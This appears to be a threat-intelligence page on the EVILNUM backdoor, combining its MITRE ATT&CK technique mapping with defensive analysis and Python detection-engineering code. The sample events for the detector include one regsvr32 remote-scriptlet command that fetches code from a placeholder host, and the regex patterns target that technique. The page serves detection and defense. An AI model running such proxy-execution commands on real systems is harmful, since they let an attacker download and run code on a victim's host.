
S0568: EVILNUM

EVILNUM is a fully capable backdoor that was first identified in 2018. EVILNUM is used by the APT group of the same name, Evilnum.[1][2]

Domain: Enterprise | ID: S0568 | Type: Malware | Object version: 1.0 | Modified:
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

EVILNUM matters because ATT&CK describes it as a Windows backdoor associated with the Evilnum threat group, with related behaviors spanning discovery, persistence, command-and-control, exfiltration, defense evasion, and session-cookie theft. For leaders, the decision value is not the malware name alone; it is whether the organization can prove it would see a Windows host being profiled, made persistent through registry/startup mechanisms, proxy-executing code through trusted Windows binaries, communicating through C2, and moving data out over that same channel.

Executive priority

Prioritize EVILNUM as a coverage-validation case for Windows endpoint resilience, identity/session protection, and SOC/IR readiness. The ATT&CK relationships point to risks that affect continuity and incident decision-making: persistent backdoor access, security-tool discovery, registry modification, use of trusted Windows utilities, web session cookie theft, and exfiltration over C2. Executives should ask whether the SOC can correlate endpoint, registry, process, WMI, browser/session, and network evidence into a defensible incident narrative for audit, containment, and risk acceptance.

Technical view

ATT&CK provides no dedicated detection text for EVILNUM, so defenders should validate coverage against the related techniques on Windows: System Owner/User Discovery, System Information Discovery, Security Software Discovery, WMI execution, Modify Registry, Registry Run Keys/Startup Folder persistence, Regsvr32 and Rundll32 proxy execution, Timestomp, Indicator Removal, Ingress Tool Transfer, One-Way Communication, Exfiltration Over C2 Channel, and Steal Web Session Cookie. Detection engineering should focus on behavior chains rather than a single indicator: discovery followed by registry persistence or proxy execution, then external communications and possible data transfer.
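The coverage-validation step above can be made concrete by mapping the 14 technique IDs from this page's relationship table against a detection inventory. The Python below is an added example, not Glexia or MITRE code: the technique IDs are the page's own, while the rule names, their ATT&CK tags and their data sources are a constructed, hypothetical inventory that describes no real environment. A rule tagged with a parent technique counts as covering its sub-techniques; a rule tagged with a sub-technique only partially covers the parent.

```python
"""Coverage check for the ATT&CK techniques mapped to EVILNUM (S0568).

Added example, not Glexia or MITRE code. EVILNUM_TECHNIQUES lists the 14 IDs
from this page's relationship table; DETECTION_INVENTORY is a constructed,
hypothetical rule set whose names and tags describe no real environment."""

EVILNUM_TECHNIQUES = {
    "T1102.003": "One-Way Communication",
    "T1547.001": "Registry Run Keys / Startup Folder",
    "T1070": "Indicator Removal",
    "T1082": "System Information Discovery",
    "T1041": "Exfiltration Over C2 Channel",
    "T1539": "Steal Web Session Cookie",
    "T1070.006": "Timestomp",
    "T1112": "Modify Registry",
    "T1105": "Ingress Tool Transfer",
    "T1033": "System Owner/User Discovery",
    "T1218.011": "Rundll32",
    "T1518.001": "Security Software Discovery",
    "T1218.010": "Regsvr32",
    "T1047": "Windows Management Instrumentation",
}

# Hypothetical rules: name -> ATT&CK tags and the data source each relies on.
DETECTION_INVENTORY = {
    "win_regsvr32_remote_scriptlet": {"tags": ["T1218.010"], "source": "process_creation"},
    "win_rundll32_user_writable_module": {"tags": ["T1218.011"], "source": "process_creation"},
    "win_run_key_value_set": {"tags": ["T1547.001", "T1112"], "source": "registry"},
    "win_wmic_enumeration": {"tags": ["T1047"], "source": "process_creation"},
    "win_creation_time_rewritten": {"tags": ["T1070.006"], "source": "file"},
    "net_beacon_to_git_or_forum_host": {"tags": ["T1102"], "source": "proxy"},
}


def parent_of(tid):
    return tid.split(".")[0]


def coverage_report(techniques, inventory):
    """Classify each technique as covered, partial (sub-technique rule only) or uncovered."""
    report = {"covered": {}, "partial": {}, "uncovered": []}
    for tid in techniques:
        exact, inherited, partial = [], [], []
        for rule, meta in inventory.items():
            for tag in meta["tags"]:
                if tag == tid:
                    exact.append(rule)
                elif "." in tid and tag == parent_of(tid):
                    inherited.append(rule)   # parent-level rule covers the sub-technique
                elif "." in tag and parent_of(tag) == tid:
                    partial.append(rule)     # sub-technique rule only partially covers the parent
        if exact or inherited:
            report["covered"][tid] = exact + inherited
        elif partial:
            report["partial"][tid] = partial
        else:
            report["uncovered"].append(tid)
    return report


def sources_in_use(report, inventory):
    """Data sources the covering rules actually depend on; compare against what is collected."""
    rules = [r for rs in report["covered"].values() for r in rs]
    rules += [r for rs in report["partial"].values() for r in rs]
    return {inventory[r]["source"] for r in rules}


if __name__ == "__main__":
    rep = coverage_report(EVILNUM_TECHNIQUES, DETECTION_INVENTORY)
    for tid in rep["uncovered"]:
        print("no rule:", tid, EVILNUM_TECHNIQUES[tid])
    for tid, rules in rep["partial"].items():
        print("partial:", tid, EVILNUM_TECHNIQUES[tid], "via", rules)
    print("sources relied on:", sorted(sources_in_use(rep, DETECTION_INVENTORY)))
```

With the constructed inventory, the report shows the discovery, exfiltration, ingress-tool-transfer and cookie-theft techniques with no rule at all, and Indicator Removal covered only through its Timestomp sub-technique, which is the kind of gap list the technical view asks teams to produce before claiming coverage.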

Likely telemetry

  • Windows endpoint process creation and command-line telemetry, especially for wmic/WMI activity, regsvr32.exe, rundll32.exe, reg.exe, and suspicious child-process relationships
  • Windows Registry auditing or EDR registry-change telemetry for Run keys, startup folder references, and other persistence-related modifications
  • WMI event logs and remote/local WMI execution traces where collected
  • File system metadata telemetry that can support timestomp or suspicious file-change analysis
  • Endpoint security product events, including evidence of security software discovery or tampering attempts where available

Detection direction

  • Build detections around sequences: host/user/system discovery followed by registry modification, startup persistence, proxy execution via regsvr32 or rundll32, and outbound communications.
  • Tune trusted-binary detections carefully. Regsvr32 and rundll32 are legitimate Windows utilities, so prioritize unusual command lines, unexpected parent processes, uncommon paths, unsigned or suspicious modules, and execution from user-writable locations.
  • Validate that WMI execution is visible. Many environments log process starts but miss WMI context, remote origin, or command content, creating a common blind spot.
  • Correlate endpoint and network evidence for C2 and exfiltration. ATT&CK links EVILNUM to one-way communication, ingress tool transfer, and exfiltration over C2, so network-only or endpoint-only views may be insufficient.
  • Include identity/session context because the related behavior includes web session cookie theft. Confirm whether browser/session artifacts and anomalous authenticated use can be investigated without over-collecting sensitive data.
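The sequence-based detection and the trusted-binary tuning described in the points above, as an added example that is not Glexia's or any vendor's detection content. The event fields (host, ts, event, image, parent_image, cmdline, target_object, dest) are assumptions modelled on Sysmon event IDs 1, 13 and 3, and every event in the sample is constructed for illustration, not captured from an incident. The chain requires discovery, then Run-key persistence or a suspicious regsvr32/rundll32 invocation, then an outbound connection, all on one host within a time window; a regsvr32 run by an installer against a system DLL does not qualify.

```python
"""Behavior-chain detection over constructed Sysmon-style events for the EVILNUM
technique set. Added example, not Glexia's or any vendor's content: the event
fields (host, ts, event, image, parent_image, cmdline, target_object, dest) are
assumptions modelled on Sysmon event IDs 1, 13 and 3, and every event below is
constructed for illustration, not captured from an incident."""
from datetime import datetime, timedelta
import ipaddress
import re

DISCOVERY_BINARIES = {"whoami.exe", "hostname.exe", "systeminfo.exe", "wmic.exe"}
PROXY_BINARIES = {"regsvr32.exe", "rundll32.exe"}
# Parents that rarely have a legitimate reason to spawn regsvr32/rundll32.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "powershell.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"\\(users|programdata|temp|appdata)\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://|scrobj\.dll", re.IGNORECASE)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def is_discovery(ev):
    return ev["event"] == "process_create" and basename(ev["image"]) in DISCOVERY_BINARIES

def is_persistence(ev):
    return ev["event"] == "registry_set" and RUN_KEY.search(ev["target_object"]) is not None

def is_suspicious_proxy_exec(ev):
    """regsvr32/rundll32 count only when the invocation itself is off (remote scriptlet,
    module in a user-writable path, or an unexpected parent), not on every run."""
    if ev["event"] != "process_create" or basename(ev["image"]) not in PROXY_BINARIES:
        return False
    return (REMOTE_SCRIPTLET.search(ev["cmdline"]) is not None
            or USER_WRITABLE.search(ev["cmdline"]) is not None
            or basename(ev["parent_image"]) in SUSPICIOUS_PARENTS)

def is_external_connection(ev):
    # RFC 1918 and loopback are internal; everything else is treated as outbound.
    return (ev["event"] == "network_connect"
            and not any(ipaddress.ip_address(ev["dest"]) in n for n in INTERNAL_NETS))

STAGES = [("discovery", is_discovery),
          ("persistence_or_proxy_exec", lambda e: is_persistence(e) or is_suspicious_proxy_exec(e)),
          ("outbound", is_external_connection)]

def find_chains(events, window_minutes=30):
    """One alert per host where the three stages occur in order within the window."""
    window = timedelta(minutes=window_minutes)
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        stage, matched, start = 0, [], None
        for ev in evs:
            t = datetime.fromisoformat(ev["ts"])
            if start is not None and t - start > window:
                stage, matched, start = 0, [], None      # partial chain went stale
            name, predicate = STAGES[stage]
            if predicate(ev):
                matched.append((name, ev))
                start = t if start is None else start
                stage += 1
                if stage == len(STAGES):
                    alerts.append({"host": host, "stages": matched})
                    stage, matched, start = 0, [], None
    return alerts

def ev(host, ts, event, **f):
    return {"host": host, "ts": ts, "event": event, "image": "", "parent_image": "",
            "cmdline": "", "target_object": "", "dest": "", **f}

CMD, MSI = r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe"
# Constructed sample: WS-1 runs the full chain, WS-2 is an installer registering a
# system DLL plus browsing, WS-3 has WS-1's pieces but spread beyond the window.
SAMPLE_EVENTS = [
    ev("WS-1", "2024-05-06T10:00:00", "process_create", image=r"C:\Windows\System32\whoami.exe",
       parent_image=CMD, cmdline="whoami"),
    ev("WS-1", "2024-05-06T10:01:00", "process_create", image=r"C:\Windows\System32\regsvr32.exe",
       parent_image=CMD, cmdline=r"regsvr32.exe /s /n /u /i:https://example.invalid/u.sct scrobj.dll"),
    ev("WS-1", "2024-05-06T10:01:10", "registry_set",
       target_object=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    ev("WS-1", "2024-05-06T10:02:00", "network_connect", image=r"C:\Windows\System32\rundll32.exe",
       dest="203.0.113.10"),            # documentation range standing in for a public C2 host
    ev("WS-2", "2024-05-06T09:00:00", "process_create", image=r"C:\Windows\System32\hostname.exe",
       parent_image=CMD, cmdline="hostname"),
    ev("WS-2", "2024-05-06T09:00:30", "process_create", image=r"C:\Windows\System32\regsvr32.exe",
       parent_image=MSI, cmdline=r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
    ev("WS-2", "2024-05-06T09:05:00", "network_connect", image=r"C:\Program Files\Chrome\chrome.exe",
       dest="198.51.100.7"),
    ev("WS-3", "2024-05-06T08:00:00", "process_create", image=r"C:\Windows\System32\whoami.exe",
       parent_image=CMD, cmdline="whoami"),
    ev("WS-3", "2024-05-06T08:45:00", "process_create", image=r"C:\Windows\System32\rundll32.exe",
       parent_image=r"C:\Windows\explorer.exe", cmdline=r"rundll32.exe C:\Users\bob\AppData\Local\Temp\x.dll,Start"),
    ev("WS-3", "2024-05-06T08:46:00", "network_connect", image=r"C:\Windows\System32\rundll32.exe",
       dest="203.0.113.10"),
]
```

Running `find_chains(SAMPLE_EVENTS)` yields a single alert for WS-1 whose stages are the whoami run, the regsvr32 remote-scriptlet invocation and the outbound connection; WS-2 never satisfies the middle stage, and WS-3 only alerts if the window is widened past 45 minutes. In production the discovery stage would key on more than binary names, and the outbound stage would carry the destination and any ingress/exfiltration volume so the network and endpoint views are joined in one record.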

Mitigation priorities

  • Harden Windows persistence paths first: monitor and restrict unauthorized Run key, startup folder, and registry modifications according to business need.
  • Reduce abuse of trusted Windows utilities by applying application control or policy restrictions where feasible, especially for regsvr32, rundll32, and script/proxy execution patterns.
  • Improve least-privilege and administrative control over WMI and registry access, including review of who can execute management actions locally or remotely.
  • Strengthen endpoint and network logging retention so indicator removal or timestamp manipulation does not eliminate the only available evidence.
  • Protect web sessions through identity controls, session governance, and investigation playbooks for suspected cookie theft or anomalous authenticated access.

Analyst notes and limits

The ATT&CK object identifies EVILNUM as a fully capable backdoor first identified in 2018 and used by the Evilnum group, which ATT&CK describes as financially motivated and active since at least 2018. The strongest defensive value comes from the relationship set: the malware is mapped to Windows-relevant discovery, persistence, proxy execution, registry modification, C2, exfiltration, and credential/session-access behaviors.

ATT&CK provides no official detection guidance for this software object and no object-level tactics are specified. Some related ATT&CK techniques list platforms beyond Windows, but the EVILNUM object itself is supplied with Windows as its platform, so local validation should focus on Windows unless other environment evidence justifies broader scope. This take does not assert current exploitation, customer exposure, or guaranteed detection coverage.

Official MITRE ATT&CK definition

EVILNUM

EVILNUM is a fully capable backdoor that was first identified in 2018. EVILNUM is used by the APT group of the same name, Evilnum.[1][2]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

14 rows
Domain | ID | Name | Relationship / procedure

Enterprise T1102.003 One-Way Communication (Sub-technique)

EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2.[2]

Enterprise T1547.001 Registry Run Keys / Startup Folder (Sub-technique)

EVILNUM can achieve persistence through the Registry Run key.[1][2]

Enterprise T1070 Indicator Removal

EVILNUM has a function called "DeleteLeftovers" to remove certain artifacts of the attack.[2]

Enterprise T1082 System Information Discovery

EVILNUM can obtain the computer name from the victim's system.[2]

Enterprise T1041 Exfiltration Over C2 Channel

EVILNUM can upload files over the C2 channel from the infected host.[2]

Enterprise T1539 Steal Web Session Cookie

EVILNUM can harvest cookies and upload them to the C2 server.[2]

Enterprise T1070.006 Timestomp (Sub-technique)

EVILNUM has changed the creation date of files.[2]

Enterprise T1112 Modify Registry

EVILNUM can make modifications to the Registry for persistence.[2]

Enterprise T1105 Ingress Tool Transfer

EVILNUM can download and upload files to the victim's computer.[1][2]

Enterprise T1033 System Owner/User Discovery

EVILNUM can obtain the username from the victim's machine.[2]

Enterprise T1218.011 Rundll32 (Sub-technique)

EVILNUM can execute commands and scripts through rundll32.[2]

Enterprise T1518.001 Security Software Discovery (Sub-technique)

EVILNUM can search for anti-virus products on the system.[2]

Enterprise T1218.010 Regsvr32 (Sub-technique)

EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe.[1]

Enterprise T1047 Windows Management Instrumentation

EVILNUM has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.[2]

Associated objects

Groups, software, and campaigns

Relationship explorer

All related ATT&CK context

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, the table can be used to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 981233a34729dceb...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 981233a34729…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] ESET EvilNum July 2020. Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.
  2. [2] Prevailion EvilNum May 2020. Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved November 17, 2024.
  3. [3] EVILNUM. ATT&CK software description; cites [2] and [1].
  4. [4] mitre-attack S0568. MITRE-hosted ATT&CK entry for this object.
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.